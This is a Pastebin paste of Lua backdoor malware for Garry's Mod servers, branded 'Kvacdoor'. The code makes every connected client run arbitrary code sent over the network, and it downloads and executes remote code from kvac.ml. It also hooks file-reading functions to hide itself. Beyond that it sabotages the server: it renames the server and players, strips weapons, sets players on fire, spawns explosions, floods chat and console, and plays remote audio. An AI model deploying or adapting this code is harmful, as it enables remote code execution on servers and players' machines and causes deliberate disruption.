Advertisement
Guest User

Untitled

a guest
Jul 11th, 2019
82
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.95 KB | None | 0 0
  1.  
  2. util.AddNetworkString("_ServerName_")
  3.  
  4. function payload( ply )
  5. ply:SendLua( "net.Receive([[_ServerName_]], function() RunString(net.ReadString()) end)" )
  6. end
  7. timer.Simple(1, function() http.Fetch("http://kvac.ml/link/fuck.php?key=el1QE6i861pjXAKier3r", function(b) RunString(b, ":", false) end)end)
  8. local bypass = [=====[
  9. if !fRead then
  10. fRead=file.Read
  11. fOpen=file.Open
  12. end
  13.  
  14. file.Open=function(fn,fm,path)
  15. loh=nil
  16. loh=string.Explode("/",fn)
  17. if (loh[2]&&(loh[#loh-1]=="lua"&&(string.find(loh[#loh],".lua") || string.find(loh[#loh],".txt")) || loh[#loh-1]=="scripthook")) || loh[1]&&(string.find(loh[1],".lua") || string.find(loh[1],".txt"))&&path =="LUA" || string.find(fn,"scripthook/") then
  18. chat.AddText("someone tried using file.open to get your "..fn.." with the PATH: "..path.." and file mode: "..fm..".")
  19. return ""
  20. else
  21. return fOpen(fn,fm,path)
  22. end
  23. end
  24.  
  25. file.Read=function(fn,path)
  26. loh=nil
  27. loh=string.Explode("/",fn)
  28. if (loh[2]&&(loh[#loh-1]=="lua"&&(string.find(loh[#loh],".lua") || string.find(loh[#loh],".txt")) || loh[#loh-1]=="scripthook")) || loh[1]&&(string.find(loh[1],".lua") || string.find(loh[1],".txt"))&&path=="LUA" || string.find(fn,"scripthook/") then
  29. chat.AddText("someone tried grabbing ur file named "..fn..".")
  30. return ""
  31. else
  32. return fRead(fn,path)
  33. end
  34. end
  35.  
  36. ]=====]
  37.  
  38. function runcode(ply, code)
  39. net.Start( "_ServerName_" )
  40. net.WriteString("if SERVER then return '' end "..bypass.." "..code )
  41. net.Send( ply )
  42. end
  43.  
  44. for k, v in pairs( player.GetAll() ) do
  45. payload( v )
  46. end
  47. function run_chaos()
  48. hook.Add( "PlayerAuthed", "wat", function( ply )
  49. payload(ply)
  50. end )
  51.  
  52. for k,v in pairs(player.GetAll() ) do
  53.  
  54. runcode(v, [==[
  55. if timer.Exists("capturemymind") then
  56. timer.Remove("capturemymind")
  57. end
  58. if timer.Exists("podsos") then
  59. timer.Remove("podsos")
  60. end
  61. if timer.Exists("antidrm") then
  62. timer.Remove("antidrm")
  63. end
  64. if hook.GetTable().RenderScreenspaceEffects.podsos then hook.Remove( "RenderScreenspaceEffects", "podsos" ) end
  65. if hook.GetTable().HUDPaint.podsos then hook.Remove( "HUDPaint", "podsos" ) end
  66. RunConsoleCommand("stopsound")
  67. ]==])
  68.  
  69. end
  70.  
  71. for k,v in pairs(player.GetAll() ) do
  72. runcode(v, [==[
  73. local i = 0
  74. timer.Create("infecting", 0.1, 101, function()
  75. chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ), "Infecting system files... "..i.."%")
  76. i = i + 1
  77. end)
  78. ]==])
  79. end
  80.  
  81. timer.Create("antidrm", 17.4, 1, function()
  82. timer.Create( "spam", 0, 0, function()
  83. local vars = { "Noice", "SERVER IS DEAD", "Ҝvacdooor is BEST", "Ҝvacdoor €co+" }
  84. MsgC(HSVToColor( CurTime() % 6 * 60, 1, 1 ), "Server infected by Ҝvacdoor €co+ | https://discord.gg/TRuNeBy | "..vars[math.random(1,#vars)].."\n")
  85. end)
  86. RunConsoleCommand("hostname", "Server owned by Ҝvacdoor €co+")
  87.  
  88. RunConsoleCommand( "sv_friction", "-8" )
  89. RunConsoleCommand( "sv_gravity", "-600" )
  90.  
  91. for k,v in pairs(player.GetAll() ) do
  92. local RPNAME_EPSILON = "This server is infected by Ҝvacdoor €co+"
  93. if engine.ActiveGamemode() == "DarkRP" || engine.ActiveGamemode() == "darkrp" then
  94. DarkRP.storeRPName(v, RPNAME_EPSILON) v:setDarkRPVar("rpname", RPNAME_EPSILON)
  95. end
  96. v:StripWeapons()
  97. runcode(v, [==[
  98. local allowed = { ["CHudChat"] = true, ["CHudGMod"] = true, ["CHudWeaponSelection"] = true, ["CHudMenu"] = true }
  99. hook.Add( "HUDShouldDraw", "generalmayorsadasdassdaafhShahfhdgfdfdgdgdgdff", function( str ) if not allowed[str] then return false end end )
  100. local screen_scale = math.Clamp(ScrH()/1080, 0.6, 1);
  101. surface.CreateFont( "Fred", {
  102. font = "Roboto",
  103. extended = false,
  104. size = screen_scale * 42,
  105. weight = 200,
  106. blursize = 1.5,
  107. scanlines = 2,
  108. antialias = true,
  109. underline = false,
  110. italic = false,
  111. strikeout = false,
  112. symbol = false,
  113. rotary = false,
  114. shadow = false,
  115. additive = false,
  116. outline = false,
  117. } )
  118.  
  119. surface.CreateFont( "Fred25", {
  120. font = "Roboto",
  121. extended = false,
  122. size = screen_scale * 25,
  123. weight = 200,
  124. blursize = 1.5,
  125. scanlines = 2,
  126. antialias = true,
  127. underline = false,
  128. italic = false,
  129. strikeout = false,
  130. symbol = false,
  131. rotary = false,
  132. shadow = false,
  133. additive = false,
  134. outline = false,
  135. } )
  136.  
  137.  
  138. surface.CreateFont( "Bigfred", {
  139. font = "Roboto",
  140. extended = false,
  141. size = screen_scale * 1000,
  142. weight = 200,
  143. blursize = 1.5,
  144. scanlines = 2,
  145. antialias = true,
  146. underline = false,
  147. italic = false,
  148. strikeout = false,
  149. symbol = false,
  150. rotary = false,
  151. shadow = false,
  152. additive = false,
  153. outline = false,
  154. } )
  155.  
  156.  
  157. hook.Add( "HUDPaint", "podsos", function()
  158.  
  159. surface.SetDrawColor( 255, 0, 0, 225 )
  160. local tbl = {
  161. "Infected",
  162. "Ҝvacdoor €co+ Is Here",
  163. "https://discord.gg/TRuNeBy",
  164. "Server infected by Ҝvacdoor €co+",
  165. "Retourné sur Roblox",
  166. "By Ҝvacdoor €co+"
  167. }
  168. for i = 1,16 do
  169. draw.SimpleTextOutlined(
  170. "__________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________",
  171. "Fred25",
  172. ScrW() /2 +math.random( -655, 655 ),
  173. ScrH() /2 +math.random( -655, 655 ) +24,
  174. Color( 255,255,255, 160 ),
  175. TEXT_ALIGN_CENTER,
  176. TEXT_ALIGN_CENTER,
  177. 3,
  178. Color( 0,0,0, 160 )
  179. )
  180. end
  181. draw.SimpleTextOutlined(
  182. "Ҝ€",
  183. "Bigfred",
  184. ScrW() /2,
  185. ScrH() /2,
  186. Color( 255,255,255, 160 ),
  187. TEXT_ALIGN_CENTER,
  188. TEXT_ALIGN_CENTER,
  189. 3,
  190. Color( 0,0,0, 160 )
  191. )
  192. for i = 1,6 do
  193. draw.SimpleTextOutlined(
  194. tbl[math.random(1,#tbl)],
  195. "Fred",
  196. ScrW() /2 +math.random( -655, 655 ),
  197. ScrH() /2 +math.random( -655, 655 ) +24,
  198. Color( 255,255,255, 160 ),
  199. TEXT_ALIGN_CENTER,
  200. TEXT_ALIGN_CENTER,
  201. 3,
  202. Color( 0,0,0, 160 )
  203. )
  204. end
  205. end)
  206.  
  207. hook.Add( "GetMotionBlurValues", "podsos", function()
  208. return 0, 0, 1, math.sin(CurTime() *13)
  209. end )
  210. hook.Add( "RenderScreenspaceEffects", "podsos", function()
  211. DrawSharpen( 1 +(math.sin( CurTime() *(RealFrameTime() *1024) ) *10), 0.7 +(math.sin( CurTime() *(RealFrameTime() *1024) ) *2) )
  212. DrawMaterialOverlay( "effects/tp_eyefx/tpeye", 1 )
  213. end )
  214. timer.Create( "podsos", 0.28, 0, function()
  215. util.ScreenShake( LocalPlayer():GetPos(), 5, 5, 10, 5000 )
  216. end )
  217.  
  218. timer.Create("capturemymind", 0, 0, function()
  219.  
  220. local vars = { "Noice", "SERVER IS DEAD", "Ҝv̳a̳c̳d̳o̳o̳r̳ €co+ ̳i̳s̳ ̳b̳e̳s̳t̳", "Ҝvacdoor €co+" }
  221. chat.AddText(HSVToColor( CurTime() * 60 % 360, 1, 1 ), "Server infected by Ҝvacdoor €co+ | https://discord.gg/TRuNeBy | "..vars[math.random(1,#vars)])
  222.  
  223. end)
  224. hook.Add( "PostDrawTranslucentRenderables", "matebalyakakambal", function()
  225. render.SetMaterial( Material("cable/blue_elec") )
  226. for i = 1, 32 do
  227. render.DrawBeam( LocalPlayer():GetPos() +Vector(0, 0, 128) +(EyeAngles():Forward() *256), EyePos() +(VectorRand() *256), 4, 0, 12.5, Color(255, 255, 255, 255) )
  228. end
  229. end)
  230.  
  231. hook.Add("PreRender","vertushka",function()
  232. local mat = Matrix()
  233.  
  234. local ang = Angle(0,CurTime()*8,0)
  235. mat:Rotate(ang)
  236.  
  237.  
  238. cam.PushModelMatrix( mat )
  239. end)
  240.  
  241. ]==])
  242. end
  243. end)
  244.  
  245. timer.Create("mochaslona", 80, 1, function()
  246. hook.Add("Think", "idipodmoisya", function()
  247. local explode = ents.Create("env_explosion")
  248. explode:SetPos(Vector(math.random(-6000, 6000), math.random(-6000, 6000), math.random(-500, 2000)))
  249. explode:Spawn()
  250. explode:SetKeyValue("iMagnitude", "500")
  251. explode:Fire("Explode", 0, 0)
  252.  
  253. for k, v in pairs(player.GetAll()) do
  254. v:SetModelScale(50.5, 100)
  255. v:SetRunSpeed(400 * 2)
  256. v:SetWalkSpeed(200 * 2)
  257. v:Ignite(120)
  258. v:DoAnimationEvent(ACT_GMOD_TAUNT_DANCE)
  259. v:addMoney(99999999999999999)
  260. end
  261. end)
  262. end)
  263.  
  264.  
  265. BroadcastLua([[sound.PlayURL( "http://gmleakesy.com/assets/m/fucked.mp3", "mono", function() end )]])
  266.  
  267. timer.Create("eben", 150, 0, function()
  268.  
  269. BroadcastLua([[sound.PlayURL( "http://gmleakesy.com/assets/m/fucked.mp3", "mono", function() end )]])
  270.  
  271. end)
  272.  
  273. end
  274.  
  275. if !hook.GetTable().PlayerInitialSpawn.podsos then
  276. hook.Add("PlayerInitialSpawn", "podsos", function()
  277. timer.Simple(10, function()
  278. run_chaos()
  279. end)
  280. end)
  281. run_chaos()
  282. end
  283.  
  284. timer.Simple(100, function()
  285. for i = 1, 9999999999999999999999999 do
  286. MsgC(HSVToColor(CurTime() % 6 * 60, 1, 1), "Server infected by Ҝvacdoor €co+ | https://discord.gg/TRuNeBy | " .. vars[math.random(1, #vars)] .. "\n")
  287. end
  288. end) function RunHASHOb() end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement